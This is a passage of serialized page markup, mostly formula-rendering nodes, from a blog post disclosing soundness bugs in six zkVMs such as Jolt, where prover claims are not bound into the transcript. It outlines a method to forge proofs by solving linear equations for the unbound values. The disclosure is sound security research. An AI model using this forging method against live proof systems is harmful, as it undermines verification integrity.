tyle":25584},[1841,4048,25583],[118175],{"type":31,"value":4052},{"type":25,"tag":216,"props":118177,"children":118179},{"className":118178},[2159],[118180],{"type":25,"tag":216,"props":118181,"children":118183},{"className":118182},[298,299],[118184,118215],{"type":25,"tag":216,"props":118185,"children":118187},{"className":118186},[304],[118188,118210],{"type":25,"tag":216,"props":118189,"children":118192},{"className":118190,"style":118191},[309],"height:0.162em;",[118193],{"type":25,"tag":216,"props":118194,"children":118195},{"style":25607},[118196,118200],{"type":25,"tag":216,"props":118197,"children":118199},{"className":118198,"style":2181},[319],[],{"type":25,"tag":216,"props":118201,"children":118203},{"className":118202},[2186,2187,2188,2189],[118204],{"type":25,"tag":216,"props":118205,"children":118208},{"className":118206,"style":118207},[246,2151,2189],"margin-right:0.05724em;",[118209],{"type":31,"value":12609},{"type":25,"tag":216,"props":118211,"children":118213},{"className":118212},[408],[118214],{"type":31,"value":411},{"type":25,"tag":216,"props":118216,"children":118218},{"className":118217},[304],[118219],{"type":25,"tag":216,"props":118220,"children":118223},{"className":118221,"style":118222},[309],"height:0.4358em;",[118224],{"type":25,"tag":216,"props":118225,"children":118226},{},[],{"type":25,"tag":216,"props":118228,"children":118230},{"className":118229,"style":1871},[257],[],{"type":25,"tag":216,"props":118232,"children":118234},{"className":118233},[246],[118235,118239,118392],{"type":25,"tag":216,"props":118236,"children":118238},{"className":118237},[287,288],[],{"type":25,"tag":216,"props":118240,"children":118242},{"className":118241},[293],[118243],{"type":25,"tag":216,"props":118244,"children":118246},{"className":118245},[298,299],[118247,118380],{"type":25,"tag":216,"props":118248,"children":118250},{"className":118249},[304],[118251,118375],{"type":25,"tag":216,"props":118252,"children":118254},{"className":118253,"style":117524},[309],[118255,118344,118355],{"type":25,"tag":216,"props":118256,"children":118257},{"style":5059},[118258,118262],{"type":25,"tag":216,"props":118259,"children":118261},{"className":118260,"style":320},[319],[],{"type":25,"tag":216,"props":118263,"children":118265},{"className":118264},[2186,2187,2188,2189],[118266],{"type":25,"tag":216,"props":118267,"children":118269},{"className":118268},[246,2189],[118270,118275,118280],{"type":25,"tag":216,"props":118271,"children":118273},{"className":118272,"style":117544},[246,2151,2189],[118274],{"type":31,"value":117547},{"type":25,"tag":216,"props":118276,"children":118278},{"className":118277},[340,2189],[118279],{"type":31,"value":3378},{"type":25,"tag":216,"props":118281,"children":118283},{"className":118282},[246,2189],[118284,118293],{"type":25,"tag":216,"props":118285,"children":118287},{"className":118286},[246,31,2189],[118288],{"type":25,"tag":216,"props":118289,"children":118291},{"className":118290},[246,2189],[118292],{"type":31,"value":65976},{"type":25,"tag":216,"props":118294,"children":118296},{"className":118295},[2159],[118297],{"type":25,"tag":216,"props":118298,"children":118300},{"className":118299},[298,299],[118301,118332],{"type":25,"tag":216,"props":118302,"children":118304},{"className":118303},[304],[118305,118327],{"type":25,"tag":216,"props":118306,"children":118309},{"className":118307,"style":118308},[309],"height:0.3281em;",[118310],{"type":25,"tag":216,"props":118311,"children":118313},{"style":118312},"top:-2.357em;margin-right:0.0714em;",[118314,118318],{"type":25,"tag":216,"props":118315,"children":118317},{"className":118316,"style":5106},[319],[],{"type":25,"tag":216,"props":118319,"children":118321},{"className":118320},[2186,5111,5112,2189],[118322],{"type":25,"tag":216,"props":118323,"children":118325},{"className":118324,"style":118207},[246,2151,2189],[118326],{"type":31,"value":12609},{"type":25,"tag":216,"props":118328,"children":118330},{"className":118329},[408],[118331],{"type":31,"value":411},{"type":25,"tag":216,"props":118333,"children":118335},{"className":118334},[304],[118336],{"type":25,"tag":216,"props":118337,"children":118340},{"className":118338,"style":118339},[309],"height:0.2819em;",[118341],{"type":25,"tag":216,"props":118342,"children":118343},{},[],{"type":25,"tag":216,"props":118345,"children":118346},{"style":360},[118347,118351],{"type":25,"tag":216,"props":118348,"children":118350},{"className":118349,"style":320},[319],[],{"type":25,"tag":216,"props":118352,"children":118354},{"className":118353,"style":370},[369],[],{"type":25,"tag":216,"props":118356,"children":118357},{"style":117571},[118358,118362],{"type":25,"tag":216,"props":118359,"children":118361},{"className":118360,"style":320},[319],[],{"type":25,"tag":216,"props":118363,"children":118365},{"className":118364},[2186,2187,2188,2189],[118366],{"type":25,"tag":216,"props":118367,"children":118369},{"className":118368},[246,2189],[118370],{"type":25,"tag":216,"props":118371,"children":118373},{"className":118372},[246,2189],[118374],{"type":31,"value":184},{"type":25,"tag":216,"props":118376,"children":118378},{"className":118377},[408],[118379],{"type":31,"value":411},{"type":25,"tag":216,"props":118381,"children":118383},{"className":118382},[304],[118384],{"type":25,"tag":216,"props":118385,"children":118388},{"className":118386,"style":118387},[309],"height:0.5423em;",[118389],{"type":25,"tag":216,"props":118390,"children":118391},{},[],{"type":25,"tag":216,"props":118393,"children":118395},{"className":118394},[427,288],[],{"type":25,"tag":216,"props":118397,"children":118399},{"className":118398,"style":335},[257],[],{"type":25,"tag":216,"props":118401,"children":118403},{"className":118402},[340],[118404],{"type":31,"value":3378},{"type":25,"tag":216,"props":118406,"children":118408},{"className":118407,"style":335},[257],[],{"type":25,"tag":216,"props":118410,"children":118412},{"className":118411},[235],[118413,118418,118476,118480],{"type":25,"tag":216,"props":118414,"children":118417},{"className":118415,"style":118416},[240],"height:1.296em;vertical-align:-0.4509em;",[],{"type":25,"tag":216,"props":118419,"children":118421},{"className":118420},[1841],[118422,118427],{"type":25,"tag":216,"props":118423,"children":118425},{"className":118424,"style":25584},[1841,4048,25583],[118426],{"type":31,"value":4052},{"type":25,"tag":216,"props":118428,"children":118430},{"className":118429},[2159],[118431],{"type":25,"tag":216,"props":118432,"children":118434},{"className":118433},[298,299],[118435,118464],{"type":25,"tag":216,"props":118436,"children":118438},{"className":118437},[304],[118439,118459],{"type":25,"tag":216,"props":118440,"children":118442},{"className":118441,"style":117656},[309],[118443],{"type":25,"tag":216,"props":118444,"children":118445},{"style":25607},[118446,118450],{"type":25,"tag":216,"props":118447,"children":118449},{"className":118448,"style":2181},[319],[],{"type":25,"tag":216,"props":118451,"children":118453},{"className":118452},[2186,2187,2188,2189],[118454],{"type":25,"tag":216,"props":118455,"children":118457},{"className":118456,"style":98437},[246,2151,2189],[118458],{"type":31,"value":92655},{"type":25,"tag":216,"props":118460,"children":118462},{"className":118461},[408],[118463],{"type":31,"value":411},{"type":25,"tag":216,"props":118465,"children":118467},{"className":118466},[304],[118468],{"type":25,"tag":216,"props":118469,"children":118472},{"className":118470,"style":118471},[309],"height:0.2997em;",[118473],{"type":25,"tag":216,"props":118474,"children":118475},{},[],{"type":25,"tag":216,"props":118477,"children":118479},{"className":118478,"style":1871},[257],[],{"type":25,"tag":216,"props":118481,"children":118483},{"className":118482},[246],[118484,118488,118641],{"type":25,"tag":216,"props":118485,"children":118487},{"className":118486},[287,288],[],{"type":25,"tag":216,"props":118489,"children":118491},{"className":118490},[293],[118492],{"type":25,"tag":216,"props":118493,"children":118495},{"className":118494},[298,299],[118496,118629],{"type":25,"tag":216,"props":118497,"children":118499},{"className":118498},[304],[118500,118624],{"type":25,"tag":216,"props":118501,"children":118503},{"className":118502,"style":117524},[309],[118504,118593,118604],{"type":25,"tag":216,"props":118505,"children":118506},{"style":5059},[118507,118511],{"type":25,"tag":216,"props":118508,"children":118510},{"className":118509,"style":320},[319],[],{"type":25,"tag":216,"props":118512,"children":118514},{"className":118513},[2186,2187,2188,2189],[118515],{"type":25,"tag":216,"props":118516,"children":118518},{"className":118517},[246,2189],[118519,118524,118529],{"type":25,"tag":216,"props":118520,"children":118522},{"className":118521,"style":117544},[246,2151,2189],[118523],{"type":31,"value":117547},{"type":25,"tag":216,"props":118525,"children":118527},{"className":118526},[340,2189],[118528],{"type":31,"value":3378},{"type":25,"tag":216,"props":118530,"children":118532},{"className":118531},[246,2189],[118533,118543],{"type":25,"tag":216,"props":118534,"children":118536},{"className":118535},[246,31,2189],[118537],{"type":25,"tag":216,"props":118538,"children":118540},{"className":118539},[246,2189],[118541],{"type":31,"value":118542},"consume",{"type":25,"tag":216,"props":118544,"children":118546},{"className":118545},[2159],[118547],{"type":25,"tag":216,"props":118548,"children":118550},{"className":118549},[298,299],[118551,118581],{"type":25,"tag":216,"props":118552,"children":118554},{"className":118553},[304],[118555,118576],{"type":25,"tag":216,"props":118556,"children":118558},{"className":118557,"style":5097},[309],[118559],{"type":25,"tag":216,"props":118560,"children":118562},{"style":118561},"top:-2.3488em;margin-right:0.0714em;",[118563,118567],{"type":25,"tag":216,"props":118564,"children":118566},{"className":118565,"style":5106},[319],[],{"type":25,"tag":216,"props":118568,"children":118570},{"className":118569},[2186,5111,5112,2189],[118571],{"type":25,"tag":216,"props":118572,"children":118574},{"className":118573,"style":98437},[246,2151,2189],[118575],{"type":31,"value":92655},{"type":25,"tag":216,"props":118577,"children":118579},{"className":118578},[408],[118580],{"type":31,"value":411},{"type":25,"tag":216,"props":118582,"children":118584},{"className":118583},[304],[118585],{"type":25,"tag":216,"props":118586,"children":118589},{"className":118587,"style":118588},[309],"height:0.1512em;",[118590],{"type":25,"tag":216,"props":118591,"children":118592},{},[],{"type":25,"tag":216,"props":118594,"children":118595},{"style":360},[118596,118600],{"type":25,"tag":216,"props":118597,"children":118599},{"className":118598,"style":320},[319],[],{"type":25,"tag":216,"props":118601,"children":118603},{"className":118602,"style":370},[369],[],{"type":25,"tag":216,"props":118605,"children":118606},{"style":117571},[118607,118611],{"type":25,"tag":216,"props":118608,"children":118610},{"className":118609,"style":320},[319],[],{"type":25,"tag":216,"props":118612,"children":118614},{"className":118613},[2186,2187,2188,2189],[118615],{"type":25,"tag":216,"props":118616,"children":118618},{"className":118617},[246,2189],[118619],{"type":25,"tag":216,"props":118620,"children":118622},{"className":118621},[246,2189],[118623],{"type":31,"value":184},{"type":25,"tag":216,"props":118625,"children":118627},{"className":118626},[408],[118628],{"type":31,"value":411},{"type":25,"tag":216,"props":118630,"children":118632},{"className":118631},[304],[118633],{"type":25,"tag":216,"props":118634,"children":118637},{"className":118635,"style":118636},[309],"height:0.4509em;",[118638],{"type":25,"tag":216,"props":118639,"children":118640},{},[],{"type":25,"tag":216,"props":118642,"children":118644},{"className":118643},[427,288],[],{"type":25,"tag":38,"props":118646,"children":118647},{},[118648,118650,118832],{"type":31,"value":118649},"The global check: ",{"type":25,"tag":82,"props":118651,"children":118653},{"className":118652},[212,4702],[118654],{"type":25,"tag":216,"props":118655,"children":118657},{"className":118656},[224],[118658],{"type":25,"tag":216,"props":118659,"children":118661},{"className":118660,"ariaHidden":230},[229],[118662,118819],{"type":25,"tag":216,"props":118663,"children":118665},{"className":118664},[235],[118666,118670,118727,118731,118740,118745,118806,118810,118815],{"type":25,"tag":216,"props":118667,"children":118669},{"className":118668,"style":96960},[240],[],{"type":25,"tag":216,"props":118671,"children":118673},{"className":118672},[1841],[118674,118679],{"type":25,"tag":216,"props":118675,"children":118677},{"className":118676,"style":25584},[1841,4048,25583],[118678],{"type":31,"value":4052},{"type":25,"tag":216,"props":118680,"children":118682},{"className":118681},[2159],[118683],{"type":25,"tag":216,"props":118684,"children":118686},{"className":118685},[298,299],[118687,118716],{"type":25,"tag":216,"props":118688,"children":118690},{"className":118689},[304],[118691,118711],{"type":25,"tag":216,"props":118692,"children":118694},{"className":118693,"style":118191},[309],[118695],{"type":25,"tag":216,"props":118696,"children":118697},{"style":25607},[118698,118702],{"type":25,"tag":216,"props":118699,"children":118701},{"className":118700,"style":2181},[319],[],{"type":25,"tag":216,"props":118703,"children":118705},{"className":118704},[2186,2187,2188,2189],[118706],{"type":25,"tag":216,"props":118707,"children":118709},{"className":118708},[246,2151,2189],[118710],{"type":31,"value":2289},{"type":25,"tag":216,"props":118712,"children":118714},{"className":118713},[408],[118715],{"type":31,"value":411},{"type":25,"tag":216,"props":118717,"children":118719},{"className":118718},[304],[118720],{"type":25,"tag":216,"props":118721,"children":118723},{"className":118722,"style":118471},[309],[118724],{"type":25,"tag":216,"props":118725,"children":118726},{},[],{"type":25,"tag":216,"props":118728,"children":118730},{"className":118729,"style":1871},[257],[],{"type":25,"tag":216,"props":118732,"children":118734},{"className":118733},[246,31],[118735],{"type":25,"tag":216,"props":118736,"children":118738},{"className":118737},[246],[118739],{"type":31,"value":118077},{"type":25,"tag":216,"props":118741,"children":118743},{"className":118742,"style":2752},[246],[118744],{"type":31,"value":7031},{"type":25,"tag":216,"props":118746,"children":118748},{"className":118747},[246],[118749,118758],{"type":25,"tag":216,"props":118750,"children":118752},{"className":118751},[246,31],[118753],{"type":25,"tag":216,"props":118754,"children":118756},{"className":118755},[246],[118757],{"type":31,"value":80604},{"type":25,"tag":216,"props":118759,"children":118761},{"className":118760},[2159],[118762],{"type":25,"tag":216,"props":118763,"children":118765},{"className":118764},[298,299],[118766,118795],{"type":25,"tag":216,"props":118767,"children":118769},{"className":118768},[304],[118770,118790],{"type":25,"tag":216,"props":118771,"children":118773},{"className":118772,"style":2270},[309],[118774],{"type":25,"tag":216,"props":118775,"children":118776},{"style":118114},[118777,118781],{"type":25,"tag":216,"props":118778,"children":118780},{"className":118779,"style":2181},[319],[],{"type":25,"tag":216,"props":118782,"children":118784},{"className":118783},[2186,2187,2188,2189],[118785],{"type":25,"tag":216,"props":118786,"children":118788},{"className":118787},[246,2151,2189],[118789],{"type":31,"value":2289},{"type":25,"tag":216,"props":118791,"children":118793},{"className":118792},[408],[118794],{"type":31,"value":411},{"type":25,"tag":216,"props":118796,"children":118798},{"className":118797},[304],[118799],{"type":25,"tag":216,"props":118800,"children":118802},{"className":118801,"style":2209},[309],[118803],{"type":25,"tag":216,"props":118804,"children":118805},{},[],{"type":25,"tag":216,"props":118807,"children":118809},{"className":118808,"style":258},[257],[],{"type":25,"tag":216,"props":118811,"children":118813},{"className":118812},[263],[118814],{"type":31,"value":266},{"type":25,"tag":216,"props":118816,"children":118818},{"className":118817,"style":258},[257],[],{"type":25,"tag":216,"props":118820,"children":118822},{"className":118821},[235],[118823,118827],{"type":25,"tag":216,"props":118824,"children":118826},{"className":118825,"style":5293},[240],[],{"type":25,"tag":216,"props":118828,"children":118830},{"className":118829},[246],[118831],{"type":31,"value":1882},{"type":31,"value":179},{"type":25,"tag":38,"props":118834,"children":118835},{},[118836,118841,118843,118849],{"type":25,"tag":9273,"props":118837,"children":118838},{},[118839],{"type":31,"value":118840},"Why this is vulnerable:",{"type":31,"value":118842}," The ",{"type":25,"tag":82,"props":118844,"children":118846},{"className":118845},[],[118847],{"type":31,"value":118848},"claimed_sum",{"type":31,"value":118850}," values are prover-supplied. If they're not in the transcript before challenges are derived, the prover can adjust them to make the sum zero for an invalid execution.",{"type":25,"tag":22753,"props":118852,"children":118853},{},[],{"type":25,"tag":26,"props":118855,"children":118857},{"id":118856},"the-universal-attack-pattern",[118858],{"type":31,"value":118859},"The Universal Attack Pattern",{"type":25,"tag":38,"props":118861,"children":118862},{},[118863],{"type":31,"value":118864},"Now we can describe the attack pattern that works on all six systems:",{"type":25,"tag":38,"props":118866,"children":118867},{},[118868],{"type":25,"tag":6467,"props":118869,"children":118872},{"alt":118870,"src":118871},"2_attack_pattern","/posts/zkvms-unfaithful-claims/2_attack_pattern.svg",[],{"type":25,"tag":38,"props":118874,"children":118875},{},[118876,118878,118903],{"type":31,"value":118877},"When a value ",{"type":25,"tag":82,"props":118879,"children":118881},{"className":118880},[212,4702],[118882],{"type":25,"tag":216,"props":118883,"children":118885},{"className":118884},[224],[118886],{"type":25,"tag":216,"props":118887,"children":118889},{"className":118888,"ariaHidden":230},[229],[118890],{"type":25,"tag":216,"props":118891,"children":118893},{"className":118892},[235],[118894,118898],{"type":25,"tag":216,"props":118895,"children":118897},{"className":118896,"style":4799},[240],[],{"type":25,"tag":216,"props":118899,"children":118901},{"className":118900,"style":112203},[246,2151],[118902],{"type":31,"value":112527},{"type":31,"value":118904}," isn't transcript-bound:",{"type":25,"tag":6711,"props":118906,"children":118907},{},[118908,118939,119016,119160],{"type":25,"tag":2043,"props":118909,"children":118910},{},[118911,118913,118938],{"type":31,"value":118912},"Challenges are fixed (independent of ",{"type":25,"tag":82,"props":118914,"children":118916},{"className":118915},[212,4702],[118917],{"type":25,"tag":216,"props":118918,"children":118920},{"className":118919},[224],[118921],{"type":25,"tag":216,"props":118922,"children":118924},{"className":118923,"ariaHidden":230},[229],[118925],{"type":25,"tag":216,"props":118926,"children":118928},{"className":118927},[235],[118929,118933],{"type":25,"tag":216,"props":118930,"children":118932},{"className":118931,"style":4799},[240],[],{"type":25,"tag":216,"props":118934,"children":118936},{"className":118935,"style":112203},[246,2151],[118937],{"type":31,"value":112527},{"type":31,"value":1888},{"type":25,"tag":2043,"props":118940,"children":118941},{},[118942,118944],{"type":31,"value":118943},"The verification equation has form: ",{"type":25,"tag":82,"props":118945,"children":118947},{"className":118946},[212,4702],[118948],{"type":25,"tag":216,"props":118949,"children":118951},{"className":118950},[224],[118952],{"type":25,"tag":216,"props":118953,"children":118955},{"className":118954,"ariaHidden":230},[229],[118956,118997],{"type":25,"tag":216,"props":118957,"children":118959},{"className":118958},[235],[118960,118964,118969,118974,118979,118984,118988,118993],{"type":25,"tag":216,"props":118961,"children":118963},{"className":118962,"style":5513},[240],[],{"type":25,"tag":216,"props":118965,"children":118967},{"className":118966,"style":99359},[246,2151],[118968],{"type":31,"value":37047},{"type":25,"tag":216,"props":118970,"children":118972},{"className":118971},[287],[118973],{"type":31,"value":1850},{"type":25,"tag":216,"props":118975,"children":118977},{"className":118976,"style":112203},[246,2151],[118978],{"type":31,"value":112527},{"type":25,"tag":216,"props":118980,"children":118982},{"className":118981},[427],[118983],{"type":31,"value":1888},{"type":25,"tag":216,"props":118985,"children":118987},{"className":118986,"style":258},[257],[],{"type":25,"tag":216,"props":118989,"children":118991},{"className":118990},[263],[118992],{"type":31,"value":266},{"type":25,"tag":216,"props":118994,"children":118996},{"className":118995,"style":258},[257],[],{"type":25,"tag":216,"props":118998,"children":119000},{"className":118999},[235],[119001,119006],{"type":25,"tag":216,"props":119002,"children":119005},{"className":119003,"style":119004},[240],"height:0.8095em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":119007,"children":119009},{"className":119008},[246,31],[119010],{"type":25,"tag":216,"props":119011,"children":119013},{"className":119012},[246],[119014],{"type":31,"value":119015},"target",{"type":25,"tag":2043,"props":119017,"children":119018},{},[119019,119020,119045,119047],{"type":31,"value":11431},{"type":25,"tag":82,"props":119021,"children":119023},{"className":119022},[212,4702],[119024],{"type":25,"tag":216,"props":119025,"children":119027},{"className":119026},[224],[119028],{"type":25,"tag":216,"props":119029,"children":119031},{"className":119030,"ariaHidden":230},[229],[119032],{"type":25,"tag":216,"props":119033,"children":119035},{"className":119034},[235],[119036,119040],{"type":25,"tag":216,"props":119037,"children":119039},{"className":119038,"style":1519},[240],[],{"type":25,"tag":216,"props":119041,"children":119043},{"className":119042,"style":99359},[246,2151],[119044],{"type":31,"value":37047},{"type":31,"value":119046}," is linear: ",{"type":25,"tag":82,"props":119048,"children":119050},{"className":119049},[212,4702],[119051],{"type":25,"tag":216,"props":119052,"children":119054},{"className":119053},[224],[119055],{"type":25,"tag":216,"props":119056,"children":119058},{"className":119057,"ariaHidden":230},[229],[119059,119088,119115,119143],{"type":25,"tag":216,"props":119060,"children":119062},{"className":119061},[235],[119063,119068,119075,119079,119084],{"type":25,"tag":216,"props":119064,"children":119067},{"className":119065,"style":119066},[240],"height:0.4445em;",[],{"type":25,"tag":216,"props":119069,"children":119072},{"className":119070,"style":119071},[246,2151],"margin-right:0.0037em;",[119073],{"type":31,"value":119074},"α",{"type":25,"tag":216,"props":119076,"children":119078},{"className":119077,"style":335},[257],[],{"type":25,"tag":216,"props":119080,"children":119082},{"className":119081},[340],[119083],{"type":31,"value":343},{"type":25,"tag":216,"props":119085,"children":119087},{"className":119086,"style":335},[257],[],{"type":25,"tag":216,"props":119089,"children":119091},{"className":119090},[235],[119092,119097,119102,119106,119111],{"type":25,"tag":216,"props":119093,"children":119096},{"className":119094,"style":119095},[240],"height:0.7667em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":119098,"children":119100},{"className":119099,"style":112203},[246,2151],[119101],{"type":31,"value":112527},{"type":25,"tag":216,"props":119103,"children":119105},{"className":119104,"style":335},[257],[],{"type":25,"tag":216,"props":119107,"children":119109},{"className":119108},[340],[119110],{"type":31,"value":3539},{"type":25,"tag":216,"props":119112,"children":119114},{"className":119113,"style":335},[257],[],{"type":25,"tag":216,"props":119116,"children":119118},{"className":119117},[235],[119119,119123,119130,119134,119139],{"type":25,"tag":216,"props":119120,"children":119122},{"className":119121,"style":1519},[240],[],{"type":25,"tag":216,"props":119124,"children":119127},{"className":119125,"style":119126},[246,2151],"margin-right:0.05278em;",[119128],{"type":31,"value":119129},"β",{"type":25,"tag":216,"props":119131,"children":119133},{"className":119132,"style":258},[257],[],{"type":25,"tag":216,"props":119135,"children":119137},{"className":119136},[263],[119138],{"type":31,"value":266},{"type":25,"tag":216,"props":119140,"children":119142},{"className":119141,"style":258},[257],[],{"type":25,"tag":216,"props":119144,"children":119146},{"className":119145},[235],[119147,119151],{"type":25,"tag":216,"props":119148,"children":119150},{"className":119149,"style":119004},[240],[],{"type":25,"tag":216,"props":119152,"children":119154},{"className":119153},[246,31],[119155],{"type":25,"tag":216,"props":119156,"children":119158},{"className":119157},[246],[119159],{"type":31,"value":119015},{"type":25,"tag":2043,"props":119161,"children":119162},{},[119163,119165],{"type":31,"value":119164},"Solve: ",{"type":25,"tag":82,"props":119166,"children":119168},{"className":119167},[212,4702],[119169],{"type":25,"tag":216,"props":119170,"children":119172},{"className":119171},[224],[119173],{"type":25,"tag":216,"props":119174,"children":119176},{"className":119175,"ariaHidden":230},[229],[119177,119203,119238],{"type":25,"tag":216,"props":119178,"children":119180},{"className":119179},[235],[119181,119185,119190,119194,119199],{"type":25,"tag":216,"props":119182,"children":119184},{"className":119183,"style":4799},[240],[],{"type":25,"tag":216,"props":119186,"children":119188},{"className":119187,"style":112203},[246,2151],[119189],{"type":31,"value":112527},{"type":25,"tag":216,"props":119191,"children":119193},{"className":119192,"style":258},[257],[],{"type":25,"tag":216,"props":119195,"children":119197},{"className":119196},[263],[119198],{"type":31,"value":266},{"type":25,"tag":216,"props":119200,"children":119202},{"className":119201,"style":258},[257],[],{"type":25,"tag":216,"props":119204,"children":119206},{"className":119205},[235],[119207,119211,119216,119225,119229,119234],{"type":25,"tag":216,"props":119208,"children":119210},{"className":119209,"style":5513},[240],[],{"type":25,"tag":216,"props":119212,"children":119214},{"className":119213},[287],[119215],{"type":31,"value":1850},{"type":25,"tag":216,"props":119217,"children":119219},{"className":119218},[246,31],[119220],{"type":25,"tag":216,"props":119221,"children":119223},{"className":119222},[246],[119224],{"type":31,"value":119015},{"type":25,"tag":216,"props":119226,"children":119228},{"className":119227,"style":335},[257],[],{"type":25,"tag":216,"props":119230,"children":119232},{"className":119231},[340],[119233],{"type":31,"value":3378},{"type":25,"tag":216,"props":119235,"children":119237},{"className":119236,"style":335},[257],[],{"type":25,"tag":216,"props":119239,"children":119241},{"className":119240},[235],[119242,119246,119251,119256,119261],{"type":25,"tag":216,"props":119243,"children":119245},{"className":119244,"style":5513},[240],[],{"type":25,"tag":216,"props":119247,"children":119249},{"className":119248,"style":119126},[246,2151],[119250],{"type":31,"value":119129},{"type":25,"tag":216,"props":119252,"children":119254},{"className":119253},[427],[119255],{"type":31,"value":1888},{"type":25,"tag":216,"props":119257,"children":119259},{"className":119258},[246],[119260],{"type":31,"value":5755},{"type":25,"tag":216,"props":119262,"children":119264},{"className":119263,"style":119071},[246,2151],[119265],{"type":31,"value":119074},{"type":25,"tag":38,"props":119267,"children":119268},{},[119269],{"type":31,"value":119270},"In the simplest linear case, forging reduces to solving a low-dimensional field equation, while other systems require small coupled systems.",{"type":25,"tag":38,"props":119272,"children":119273},{},[119274,119276,119354],{"type":31,"value":119275},"For systems with multiple unbound values, we get a system of linear equations. Gaussian elimination solves it in ",{"type":25,"tag":82,"props":119277,"children":119279},{"className":119278},[212,4702],[119280],{"type":25,"tag":216,"props":119281,"children":119283},{"className":119282},[224],[119284],{"type":25,"tag":216,"props":119285,"children":119287},{"className":119286,"ariaHidden":230},[229],[119288],{"type":25,"tag":216,"props":119289,"children":119291},{"className":119290},[235],[119292,119297,119303,119308,119349],{"type":25,"tag":216,"props":119293,"children":119296},{"className":119294,"style":119295},[240],"height:1.0641em;vertical-align:-0.25em;",[],{"type":25,"tag":216,"props":119298,"children":119300},{"className":119299,"style":2752},[246,2151],[119301],{"type":31,"value":119302},"O",{"type":25,"tag":216,"props":119304,"children":119306},{"className":119305},[287],[119307],{"type":31,"value":1850},{"type":25,"tag":216,"props":119309,"children":119311},{"className":119310},[246],[119312,119317],{"type":25,"tag":216,"props":119313,"children":119315},{"className":119314},[246,2151],[119316],{"type":31,"value":2196},{"type":25,"tag":216,"props":119318,"children":119320},{"className":119319},[2159],[119321],{"type":25,"tag":216,"props":119322,"children":119324},{"className":119323},[298],[119325],{"type":25,"tag":216,"props":119326,"children":119328},{"className":119327},[304],[119329],{"type":25,"tag":216,"props":119330,"children":119332},{"className":119331,"style":7974},[309],[119333],{"type":25,"tag":216,"props":119334,"children":119335},{"style":6104},[119336,119340],{"type":25,"tag":216,"props":119337,"children":119339},{"className":119338,"style":2181},[319],[],{"type":25,"tag":216,"props":119341,"children":119343},{"className":119342},[2186,2187,2188,2189],[119344],{"type":25,"tag":216,"props":119345,"children":119347},{"className":119346},[246,2189],[119348],{"type":31,"value":21253},{"type":25,"tag":216,"props":119350,"children":119352},{"className":119351},[427],[119353],{"type":31,"value":1888},{"type":31,"value":119355}," field operations. For non-linear constraints, we might need to use some more advanced techniques like resultants and Groebner bases.",{"type":25,"tag":22753,"props":119357,"children":119358},{},[],{"type":25,"tag":26,"props":119360,"children":119362},{"id":119361},"the-six-broken-systems",[119363],{"type":31,"value":119364},"The Six Broken Systems",{"type":25,"tag":38,"props":119366,"children":119367},{},[119368],{"type":25,"tag":6467,"props":119369,"children":119372},{"alt":119370,"src":119371},"3_six_broken_systems","/posts/zkvms-unfaithful-claims/3_six_broken_systems.svg",[],{"type":25,"tag":38,"props":119374,"children":119375},{},[119376],{"type":31,"value":119377},"Now let's see how this plays out in each system. We'll go deep on the first one (Jolt) to establish the pattern, then focus on what's unique about each subsequent system.",{"type":25,"tag":22753,"props":119379,"children":119380},{},[],{"type":25,"tag":606,"props":119382,"children":119384},{"id":119383},"jolt-a16z",[119385],{"type":31,"value":119386},"Jolt (a16z)",{"type":25,"tag":38,"props":119388,"children":119389},{},[119390],{"type":31,"value":119391},"Jolt is a zkVM for RISC-V programs, built by a16z. It uses sumcheck extensively to verify execution constraints.",{"type":25,"tag":38,"props":119393,"children":119394},{},[119395],{"type":25,"tag":9273,"props":119396,"children":119397},{},[119398],{"type":31,"value":119399},"The proof structure:",{"type":25,"tag":206,"props":119401,"children":119403},{"code":119402},"JoltProof {\n    commitments: Vec\u003CCommitment>,           // Polynomial commitments to trace\n    opening_claims: Map\u003COpeningId, Claim>,  // \u003C- THE VULNERABLE VALUES\n    proofs: Map\u003CStage, SumcheckProof>,      // Sumcheck and opening proofs\n    ...\n}\n",[119404],{"type":25,"tag":82,"props":119405,"children":119406},{"__ignoreMap":7},[119407],{"type":31,"value":119402},{"type":25,"tag":38,"props":119409,"children":119410},{},[119411],{"type":25,"tag":9273,"props":119412,"children":119413},{},[119414],{"type":31,"value":119415},"The verification flow:",{"type":25,"tag":38,"props":119417,"children":119418},{},[119419],{"type":25,"tag":6467,"props":119420,"children":119423},{"alt":119421,"src":119422},"4_jolt_verification_flow","/posts/zkvms-unfaithful-claims/4_jolt_verification_flow.svg",[],{"type":25,"tag":38,"props":119425,"children":119426},{},[119427,119432,119434,119440,119442,119448,119450,119455],{"type":25,"tag":9273,"props":119428,"children":119429},{},[119430],{"type":31,"value":119431},"The bug:",{"type":31,"value":119433}," Each sumcheck instance provides an ",{"type":25,"tag":82,"props":119435,"children":119437},{"className":119436},[],[119438],{"type":31,"value":119439},"input_claim",{"type":31,"value":119441},", which is the value the polynomial allegedly sums to over the Boolean hypercube. These claims come from ",{"type":25,"tag":82,"props":119443,"children":119445},{"className":119444},[],[119446],{"type":31,"value":119447},"opening_claims",{"type":31,"value":119449}," in the proof, but they were ",{"type":25,"tag":9273,"props":119451,"children":119452},{},[119453],{"type":31,"value":119454},"never absorbed into the transcript",{"type":31,"value":119456}," before the batching coefficients were derived.",{"type":25,"tag":38,"props":119458,"children":119459},{},[119460],{"type":25,"tag":6467,"props":119461,"children":119464},{"alt":119462,"src":119463},"5_jolt_flow","/posts/zkvms-unfaithful-claims/5_jolt_flow.svg",[],{"type":25,"tag":38,"props":119466,"children":119467},{},[119468],{"type":25,"tag":9273,"props":119469,"children":119470},{},[119471],{"type":31,"value":119472},"How sumcheck uses opening_claims:",{"type":25,"tag":38,"props":119474,"children":119475},{},[119476,119478,119484,119486,119563],{"type":31,"value":119477},"In Jolt's batched sumcheck, the verifier computes a target value ",{"type":25,"tag":82,"props":119479,"children":119481},{"className":119480},[],[119482],{"type":31,"value":119483},"BatchedClaim",{"type":31,"value":119485}," by taking a random linear combination of the individual claims 